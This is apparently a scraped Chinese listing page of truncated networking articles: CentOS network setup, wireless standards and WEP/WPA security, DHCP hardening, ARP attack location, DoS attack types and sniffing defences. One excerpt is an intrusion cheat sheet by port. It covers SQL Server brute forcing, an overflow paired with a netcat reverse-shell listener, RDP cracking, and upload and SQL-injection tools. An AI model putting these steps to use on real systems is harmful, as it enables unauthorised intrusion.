为了能够使用xshell来管理我们安装好的centos7系统，所以我们要先设置centos7的网络使其能够联网。 1.选择vmware的编辑，然后点击虚拟网络编辑器 2.点击更改设置（需要有管理员权限） 3.选择vmnet0为桥接模式，选择自动或者网卡 4.打开“网络和共享中心”选择“vmware virtual ethernet adapter for vmnet8”网卡，右键选择属性，勾选vmware bridge protocol,同时设置ip为自动获取 5.设置虚拟机的网络设置，选择nat方式 6.输入命令cd /etc/sysconfig/network-scripts，到达该目录，并输入ls，查看所有文件，vi打开编辑ifcfg-ens33文件。 7.修改bootproto=dhcp...

无线通信是人们梦寐以求的技术，有了它，我们在进行数据交换时就不必受时间和空间的限制，可以随时随地浏览Internet，再也不用为网络布线而苦恼……。但是，现在相关的无线网络技术实在是太多了，毕竟有好有坏。下面就对目前流行的技术进行简单的介绍。 窄带广域网 1.HSCSD 　HSCSD（高速线路交换数据）是为无线用户提供38.3kbps速率传输的无线数据传输方式，它的速度比GSM通信标准的标准数据速率快4倍，可以和使用固定电话调制解调器的用户相比。当前，GSM网络单个信道在每个时隙只能支持1个用户，而HSCSD通过允许1个用户在同一时间同时访问多个信道来大幅改进数据访问速率。但美中不足的是，这会导致用户...

当今越来越多的产品加入到无线这个庞大的家族中，笔记本、手机、相机、投影机等设备成为人们日常必不可少的办公及通讯设备之一，也正是凭借可移动性强的特点，使许多人更加依赖无线上网。现在使用无线网络已经不仅仅局限于一个楼层里，很多办公写字楼、高级酒店、大型商场和个人别墅都迫切需要实现无线网络统一访问的解决方案。 除此之外，使用无线网络也正在成为一些中、小型企业使用的一种信息交流方式之一。然而，架设一套多层无线设备并不是像我们想象中那样，买一些设备组装起来那样简单，这里面包含了很多在组建多层无线局域网之前的很多因素，其中主要有：办公室无线信号的覆盖范围、组建无线网络的安全性、无线设备的兼容性等等问题。...

当前无线网络已经很成熟的阶段，安全设置必不可少！然无线中的DHCP问题很是凸出，从表面看，DHCP服务与企业无线网络的安全风马牛不相及，殊不知，DHCP服务会暴露企业网络的一些信息，这对于企业无线网络的运行是一个不小的威胁。因此如何禁用DHCP和如何确保企业无线网络的安全，是企业要解决的问题！本文就禁用DHCP和企业无线网络安全设置作出了全面的解析，以下就就是禁用DHCP和企业无线网络安全设置的步骤： 1、给无线网络设备加把锁 通常情况下，入侵者先是获取无线网络设备的权限，因为无线网络设备中存放着企业的网络信息。很多安全意识缺乏的网管人员，认为无线网络设备并不涉及企业网络的核心，搭建无线网络...

家庭中很多用户的无线AP具备了宽带路由功能，成为无线宽带路由器，在使用这类设备时，很多用户不光将其用做无线网络连接，利用有线宽带路由器进行有线连接，也是使用无线路由器的必修课。拿到一款无线路由器该如何将其连入家庭、办公室等需要连接的有线网络呢？也就是说面对一款没有说明书的无线路由器我们该如何进行有线接入呢?面对无线网络安装的种种问题和相关设置，我们应该如何解决？下面我们进行详细的讲解！ 在进行有线接入前，首先纠正很多初使用无线路由器的读者的基本思维错误，那就是很多电脑用户用惯了USB接口或PCI/AGP接口的设备，传统思维里其都是要安装驱动才能使用的。但对于使用WAN以太网接口（RJ45）的宽带...

每天，成千上万的人们都在用Web浏览器和SSL（Secure Sockets Layer）执行安全的信息传输。但实际上，电子商务是完全独立于SSL技术的。虽然日常消费者对于这项技术本身知之甚少或者一无所知，但这丝毫不影响他们对SSL的信任。 另一方面，即便IEEE 802.11无线技术已经有了重大改进，还是几乎没人信任该技术在保卫他们的信息安全。如果WPA（Wireless Protected Acess）被正确部署，那么它可以保证802.11无线网络至少是和SSL一样安全的，都比未受保护的有线网络要安全。如果通信专家在减轻自己对安全揪 心的同时还需要帮助客户有效地为未来网络的需求做些准备，那么他们必须明白以上道理。 2001年，加州大学伯克利分校发表...

你不会设计一个有互联网访问而没有防火墙的网络。那么，你为什么会有一个没有加密的无线网络呢?理解无线加密对于部署一个安全的无线网络是非常重要的。　　无线传输的安全类似于一封书信。有各种各样的发送书信的方法，而且每一种方法都能提高安全等级和保护这个信息的完整性。你可以发送一张明信片，但是，所有的人都可以看到明信片上的信息。你可以把信放到信封里面封好，这可以保护信件被人偶然看到。如果你确实要保证这封信只能被收件人看到，你就需要为这封信加密或者进行编码，并且确认收件人知道你的编码方式。　　无线数据传输也是如此。没有加密的无线数据在空中传输，附近的任何无线设备都有可能拦截到这些数据。　　使用WEP(有线等...

随着无线通信技术的日益成熟，无线通信产品价格一降再降，无线局域网也逐步走进千家万户。但无线网络的安全问题同时也令人担忧，毕竟在无线信号覆盖范围内，一些“心怀不测”人也有机会接入，甚至偷窥、篡改和破坏用户的重要数据文件，那如何保证无线网络的安全呢？无线加密协议（WEP和WPA）的应用就是一套行之有效的方法。WEP，让无线网络更安全在基IEEE 802.11b/g网络标准的无线局域网中，为了增强网络安全，WEP加密协议被普通家庭用户广泛使用。WEP(Wireless Equivalent Privacy)中文全称“无线等效协议”，它使用RC4加密算法，拥有“开放系统和共享密匙”两种身份验证方式，此外，WE...

文章以GSM/WCDMA为例，就2G/3G" target=_blank>3G组网、号码携带及业务开放情况进行探讨，以期对我国移动通信事业的健康发展有所俾益。 1、前言 面对的主要现实问题之一。运营商我国拥有世界上最大规模的两个GSM网络，由于IMT-2000即3G存在着WCDMA、CDMA2000和我国完全拥有自主知识产权的TD-SCDMA三大主流标准技术，而这三种标准都会在我国被采用，因此在3G建设中，不可避免地会出现GSM/WCDMA或者说2G/3G网络共存的情况。如何在这种情况下，通过2G/3G的有效组网，以保证2G/3G网络的合理共存，是我国移动通信 2、组网情况分析 具体2G/3G无线组网可以从以下几个方面进行考虑：2G/3G共...

杀毒就必须找到病毒的位置，这里为大家介绍精确定位有关ARP的攻击的方法。主动定位方式：因为所有的ARP攻击源都会有其特征--网卡会处于混杂模式，可以通过ARPKiller这样的工具扫描网内有哪台机器的网卡是处于混杂模式的，从而判断这台机器有可能就是“元凶”。定位好机器后，再做病毒信息收集。 标注：网卡可以置于一种模式--混杂模式，在这种模式下工作的网卡能够收到一切通过它的数据，而不管实际上数据的目的地址是不是它。这实际就是Sniffer工作的基本原理：让网卡接收一切它所能接收的数据。 被动定位方式：在局域网发生ARP攻击时，查看交换机的动态ARP表中的内容，确定攻击源的MAC地址；也可以在局域网中部署...

最糟糕的一种安全特性就是令您错误地对安全性做出乐观估计，这在安全领域中确实存在。毕竟，如果您知道某些东西不够安全，您就会采取相应的安全措施；但如果您认为某些东西已经很安全了，那么您就不大可能再去关注它了。很遗憾，无线网络加密就属于这类如安全毯一样的安全措施：让您感觉非常放心，而实际上并没有给您带来多少东西。虽然采用有线等效加密（Wired Equivalent Privacy，WEP）总比根本没有加密强，但了解其局限性也很重要，这样您才能清楚地知道您将得到什么。了解如何从 WEP 获得最大限度的安全性也同样重要。WEP 加密的工作原理　　WEP 加密使用共享密钥和 RC4 加密算法。访问点（AP）和连接到该访问点的所有工...

1、服务拒绝攻击服务拒绝攻击企图通过使你的服务计算机崩溃或把它压跨来阻止你提供服务，服务拒绝攻击是最容易实施的攻击行为，主要包括：死亡之ping （ping of death）概览：由于在早期的阶段，路由器对包的最大尺寸都有限制，许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB，并且在对包的标题头进行读取之后，要根据该标题头里包含的信息来为有效载荷生成缓冲区，当产生畸形的，声称自己的尺寸超过ICMP上限的包也就是加载的尺寸超过64K上限时，就会出现内存分配错误，导致TCP/IP堆栈崩溃，致使接受方当机。防御：现在所有的标准TCP/IP实现都已实现对付超大尺寸的包，并且大多数防火墙能够自动过滤这些攻击，包...

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的，测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe，扫描空口令的机器 3. 3899的入侵 对很早的机器，可以试试3389的溢出(win3389ex.exe) 对2000的机器，可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器，可以用webdav入侵; 对bbs论坛，可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件...

IP地址冲突，MAC地址重复这种网络故障会直接影响日常计算机的网络访问，更有甚者会影响整个网络的正常运行，不过这些冲突都可以通过软件和系统报错来了解并在第一时间解决。然而在实际维护网络过程中却偶尔出现隐性地址冲突，这种冲突很难察觉到，而危害却是巨大的。今天笔者就将自己的亲身经历和盘托出，希望各位IT168的网络管理员读者能够有所收获。一、简单网络环境引发时断时续故障近日笔者为下属公司派送华为3COM 2621路由器设备，将其作为下属公司的网络出口安装在核心交换机和光猫（用于连接光纤和以太网RJ45接口的设备）之间，所有网络流量都通过路由器转发。由于之前该公司是使用ADSL猫拨号上网，由交换机连接ADSL猫...

网络嗅探确实是难于检测的，但它确实是可以预防的，下面就介绍一些网络嗅探的预防方法。网络管理人员常用的方法有：主动集线器、加密、Kerberos、一次性口令技术、混杂模式网络接口设备等。下面将就这些方法分别展开论述。1.主动集线器集线器是连接网络较常用的设备。通常的集线器是采用广播的方式进行数据传输的，而主动式集线器只向目标地址主机发送数据包，这就使混杂模式Sniffer失效。它仅适用于10Base-T以太网（注：这种类型现在已在计算机市场消失）。 只有两家厂商曾生产过主动式集线器：3Com和HP。随着交换机的成本和价格的大幅度降低，交换机已成为非常有效的使Sniffer失效的设备。目前最常见的交换机在第三层（网络层）根据数据...

摘要： 企业网络普及已成为IT界的一个必然趋势，随着Internet的发展，Internet应用的深入人心，企业对上网的需求以及对网络的依赖越来越强烈。从本文起，本人将以一个位于2幢不同位置楼宇的不同楼层中并拥有100台计算机的小型企业为例对中小企业网络服务器组建与策略作一个全面的系列介绍。 关键字： Network网络；EnterpriseNetwork企业网；StarLAN星形局域网；Server服务器；Router路由器；GigabitEthernet千兆位以太网 究竟什么样的企业才算是中小企业？一般情况下，在国内通常将企业员工人数在500以下的企业称为中小企业。在中国，中小企业正在迅猛发展，中国劳动和社会保障部劳动科学研究所的报告指出，到2005年在中国登记注...